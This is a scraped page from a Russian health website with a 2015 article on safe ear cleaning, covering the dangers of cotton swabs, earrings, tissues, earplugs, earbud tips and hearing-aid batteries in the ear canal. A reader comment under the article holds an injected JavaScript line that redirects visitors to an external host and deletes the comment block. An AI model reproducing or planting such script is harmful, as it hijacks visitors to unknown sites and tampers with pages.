Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как почистить уши и не ог...  >>  Как почистить уши и не оглохнуть? Можно ли чистить уши ушными палочками?
 
Обратная связь
 

Как почистить уши и не оглохнуть? Можно ли чистить уши ушными палочками?

Размер шрифта
29 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Ежегодно почти 60 тысяч человек обращаются к врачу по поводу инородных тел в наружном слуховом проходе! Согласно статистике, примерно в половине случаев люди младше 65 лет повреждали орган слуха с помощью ватных палочек. Как спастись от палочек-убийц?

Уши – это самоочищающаяся система. Ушная сера непрерывно выводится из наружного слухового прохода. Более того, сера полезна для наших ушей. Она состоит из отшелушивающихся клеток, обладает кислотной средой и оказывает увлажняющее, противогрибковое и антибактериальное действие».

Чрезмерное образование и накопление серы встречается нечасто, обычно вследствие возраста или наследственности, и в таких случаях вы должны прибегнуть к помощи доктора, а не ватной палочки.

Чаще всего повреждения случаются, когда люди забывают палочки в ушах и продолжают ходить с ними. Что же происходит потом? Забывчивый человек начинает расчесываться или просто поднимает руки и в результате проталкивает палочку глубже. Кошмар!

Также травмы происходят, когда вы чистите уши, и на вас неожиданно запрыгивает ваш ребенок или толкает внезапно открывшаяся дверь. Если ватная палочка попадает достаточно глубоко, то возможны переломы мельчайших слуховых косточек, которые участвуют в передаче звука.

Однако есть ряд других предметов, которые могут попасть в ухо и повредить его. Остерегайтесь их!

Украшения

Если вы носите серьги, убедитесь, что у них надежные застежки, а также старайтесь снимать их на ночь. Если какое-то украшение попало вам в ухо, то не пытайтесь достать его самостоятельно, так как вы можете лишь протолкнуть его глубже и повредить барабанную перепонку. Лучше обратитесь к врачу, он достанет инородное тело специальным пинцетом.

Салфетки

Некоторые люди чистят уши скрученным салфетками. Не стоит этого делать, вы лишь можете вызвать повреждения и воспаления.

Беруши

При правильном использовании беруши защищают наш слух. Однако в некоторых случаях от них отламываются частички материала и остаются в ухе. Поэтому не доверяйте мягким пластичным берушам, которые повторяют форму наружного слухового прохода. Под действием температуры тела они нагреваются и размягчаются, поэтому возможно, что при извлечении берушей вы достанете лишь их часть. Кроме того, они предназначены для одноразового использования, поэтому повторное применение повышает риск их фрагментации. Беруши из пластика или пенопласта более надежны, однако если вы заметили на них трещины или другие тревожные признаки, то лучше приобретите новую пару.

Гарнитура для наушников

Многие наушники имеют пластиковое или резиновое покрытие, которое позволяет им не выпадать из уха. Если вы заметили, что оно повреждено, то почините его или купите новые наушники.

Длительное использование подобных наушников во время тренировки проталкивает пот и ушную серу вглубь слухового прохода, что повышает риск инфекции. Если вы чувствуете боль при извлечении наушников после долгого использования, обратитесь к врачу.

Компоненты слухового аппарата

Если в слуховой проход попала батарейка от такого аппарата, то незамедлительно обратитесь к врачу! Батарейка содержит кислоту, которая может повредить орган слуха.

Еще больше о том, как защитить здоровье себя и своих близких, читайте в спецпроекте «Женское здоровье».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 22:08

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что ваши уши говорят о вас?   Что приводит к потере слуха?   Ученые научили слышать глухих   Два популярных анальгетика вызывают потерю слуха  
25 октября 2012Ученые научили слышать глухих 10 августа 2012Новая стратегия, охраняющая слух
 
03 октября 2012Два популярных анальгетика вызывают потерю слуха! 16 января 2013То, что мы слышим, зависит от того, что мы делаем
 

Слайдшоу

1
Ушные инфекции у детей Что делать с ушной серой?
Почему шумит в ушах? ИЗ-ЗА ЧЕГО вы оглохнете?
Болезни, которые должен знать каждый родитель Как не оглохнуть на отдыхе
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.